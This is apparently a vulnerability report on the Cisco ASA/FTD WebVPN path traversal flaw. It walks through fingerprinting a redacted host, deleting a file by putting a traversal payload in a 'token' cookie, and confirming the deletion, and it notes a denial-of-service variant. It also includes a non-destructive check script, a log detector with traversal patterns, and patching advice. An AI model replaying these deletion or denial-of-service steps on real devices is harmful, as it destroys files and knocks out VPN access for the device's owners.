9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.974 High
EPSS
Percentile
99.9%
Summary:
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted device.
Description:
Vulnerable host: <redacted>
An exploit could allow the attacker to view or delete arbitrary files within the web services file system of the targeted device. That file system is exposed when the WebVPN or AnyConnect features are configured on the device.
1. Identify a WebVPN host by sending a request to /+CSCOE+/session_password.html:
```
curl -skiL "https://<redacted host>/+CSCOE+/session_password.html"
```
Request:
```
GET /+CSCOE+/session_password.html HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
```
If the target is vulnerable, the response carries a `webvpn` header (empty in this capture). The header identifies the WebVPN interface, so confirm the running version against the fixed releases in the advisory before treating the device as unpatched.
Response:
```
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
```
2. Delete a file by placing the traversal payload in a `token` cookie on that request.
The first target tried was `/+CSCOU+/csco_logo.gif`. That did not work: the custom logo file (logo.gif/png) sometimes has permissions that prevent deletion. Other files in the web services file system can still be deleted, so the target used from here on is `/+CSCOE+/blank.html`, an empty HTML file. Confirm first that it exists:
Request:
```
GET /+CSCOE+/blank.html HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
```
Response:
```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13
<HTML></HTML>
```
3. Send the session_password.html request again with the traversal payload in a `token` cookie (the capture abbreviates the traversal prefix in front of `/+CSCOE+/blank.html` as `…`):
Request:
```
GET /+CSCOE+/session_password.html HTTP/1.1
Host: <redacted>
Cookie: token=…/+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: */*
```
Response:
```
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
```
The response is identical to the fingerprint in step 1, so confirm the deletion with a second request for the file, which now returns 404:
```
curl -Ik https://<redacted host>/+CSCOE+/blank.html
```
```
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN
File not found
```
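The fingerprint from step 1 and the presence check on `/+CSCOE+/blank.html`, as a small Python script added here (not part of the original writeup) that can be run against a host without deleting anything: it never sends a `token` cookie. The script and function names are this example's own; it uses only the standard library and, like the `curl -k` commands above, skips certificate validation.

```python
"""Non-destructive check for the Cisco ASA/FTD WebVPN endpoint used above.

Reproduces step 1 (GET /+CSCOE+/session_password.html, look for a `webvpn`
response header) and the presence check on /+CSCOE+/blank.html. No `token`
cookie is ever sent, so the request cannot delete anything.
"""
import http.client
import ssl
import sys

SESSION_PATH = "/+CSCOE+/session_password.html"
BLANK_PATH = "/+CSCOE+/blank.html"

# Same cookies and User-Agent the walkthrough's step 1 request carries.
BASE_HEADERS = {
    "Cookie": "webvpnlogin=1; webvpnLang=en",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) "
                  "Gecko/20100101 Firefox/76.0",
    "Accept": "*/*",
    "Connection": "close",
}


def has_webvpn_header(status, headers):
    """Step 1 signature: HTTP 200 plus a `webvpn` header (its value is empty
    in the capture above). `headers` is any iterable of (name, value) pairs,
    which is what HTTPResponse.getheaders() returns."""
    if status != 200:
        return False
    return any(name.lower() == "webvpn" for name, _value in headers)


def classify(session_status, session_headers, blank_status):
    """Summarise the two probes. A `blank_status` of 404 is the "File not
    found" state the walkthrough shows after the deletion; 200 means the
    file is still in place."""
    if not has_webvpn_header(session_status, session_headers):
        return "no-webvpn-interface"
    if blank_status == 404:
        return "webvpn-exposed, blank.html missing"
    return "webvpn-exposed, blank.html present"


def fetch(host, path, method="GET", timeout=10):
    """One TLS request without certificate validation (the `-k` in the curl
    commands above). Returns (status, list of header pairs); body discarded."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, timeout=timeout, context=ctx)
    try:
        conn.request(method, path, headers=BASE_HEADERS)
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheaders()
    finally:
        conn.close()


def check_host(host):
    """Run both probes against `host` (host or host:port) and classify."""
    status, headers = fetch(host, SESSION_PATH)
    blank_status, _ = fetch(host, BLANK_PATH, method="HEAD")
    return classify(status, headers, blank_status)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python3 asa_webvpn_check.py <host[:port]>")
    print(check_host(sys.argv[1]))
```

Run it as `python3 asa_webvpn_check.py vpn.example.com` (hostname constructed). A result of `webvpn-exposed, blank.html missing` on a device nobody has patched or rebooted is worth treating as a sign that someone has already been through step 3.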
Warning: this can also be turned into a denial of service (DoS) against the VPN. Deleting the Lua source files of the WebVPN portal from the file system breaks the WebVPN interface until the device is rebooted.
## Suggested Mitigation/Remediation Actions
Upgrade the ASA and FTD software to a fixed release per the referenced Cisco advisory, available at the following link:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
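Patching is the fix; alongside it, exploitation attempts are easy to spot in HTTP logs from a proxy, WAF or IDS in front of the device, because the request shape in step 3 is distinctive: a GET to `/+CSCOE+/session_password.html` carrying a `token` cookie whose value is a file path (a traversal sequence, or a path under `/+CSCOE+/` or `/+CSCOU+/`) rather than a session token. The Python below is an added example, not from the advisory or the original writeup. The tab-separated log format and the sample lines are constructed for it, and the set of traversal markers it matches is an assumption, chosen to cover plain and double-percent-encoded `../`.

```python
"""Flag the exploitation pattern from the walkthrough in HTTP logs.

Signature: a request to /+CSCOE+/session_password.html whose Cookie header
carries a `token` value that looks like a file path (a traversal sequence, or
a path under /+CSCOE+/ or /+CSCOU+/) instead of a session token.

Log format (constructed for this example): one request per line,
tab-separated: timestamp, client IP, method, path, Cookie header.
"""
import re
from urllib.parse import unquote

TARGET_PATH = "/+CSCOE+/session_password.html"

# Markers matched after percent-decoding. This set is an assumption chosen for
# the example: "../" and "..\" traversal, plus the two directories the
# walkthrough deletes from. Extend it for other encodings seen in your logs.
SUSPICIOUS = re.compile(r"(\.\./|\.\.\\|/\+CSCO[EU]\+/)", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Strip up to `max_rounds` layers of percent-encoding so that
    %2e%2e/ and %252e%252e/ both become ../ before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def token_from_cookie(cookie_header):
    """Return the raw `token` cookie value, or None. A plain split is used on
    purpose: an attacker-controlled value need not be a well-formed cookie."""
    for part in (cookie_header or "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name.strip() == "token":
            return value.strip()
    return None


def is_exploit_attempt(path, cookie_header):
    """True when the request matches the walkthrough's step 3 shape."""
    if path.split("?", 1)[0] != TARGET_PATH:
        return False
    token = token_from_cookie(cookie_header)
    if token is None:
        return False
    return SUSPICIOUS.search(decode_fully(token)) is not None


def scan(lines):
    """Return (timestamp, client_ip, decoded token) for every matching line."""
    hits = []
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 5:
            continue  # malformed line; a real pipeline should count these
        ts, client, _method, path, cookie = fields
        if is_exploit_attempt(path, cookie):
            hits.append((ts, client, decode_fully(token_from_cookie(cookie))))
    return hits


# Constructed sample log; client addresses and timestamps are invented.
SAMPLE_LOG = [
    # step 1 style fingerprint probe: no token cookie, not flagged
    "2020-11-04T21:40:44Z\t198.51.100.7\tGET\t/+CSCOE+/session_password.html"
    "\twebvpnlogin=1; webvpnLang=en",
    # step 3 style deletion attempt with a plain traversal prefix
    "2020-11-04T21:55:02Z\t198.51.100.7\tGET\t/+CSCOE+/session_password.html"
    "\ttoken=../+CSCOE+/blank.html",
    # same attempt, double percent-encoded to slip past a literal "../" match
    "2020-11-04T21:56:10Z\t203.0.113.9\tGET\t/+CSCOE+/session_password.html"
    "\twebvpnlogin=1; token=%252e%252e%252f%2bCSCOE%2b/blank.html",
    # ordinary session on another page: opaque token, not flagged
    "2020-11-04T22:01:00Z\t192.0.2.5\tGET\t/+CSCOE+/logon.html"
    "\ttoken=3f9a1c7e0b2d",
]

if __name__ == "__main__":
    for ts, client, token in scan(SAMPLE_LOG):
        print(f"{ts} {client} token={token}")
```

The match is deliberately done on the decoded value rather than on the raw cookie: a single `unquote` would leave `%252e%252e` untouched, and a rule keyed on the literal string `../` would miss it. Matching only on this one path keeps the rule quiet on normal WebVPN traffic, where the `token` cookie carries an opaque session identifier.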
## Impact
*High - An unauthenticated, remote attacker can read and delete files within the web services file system of the device.*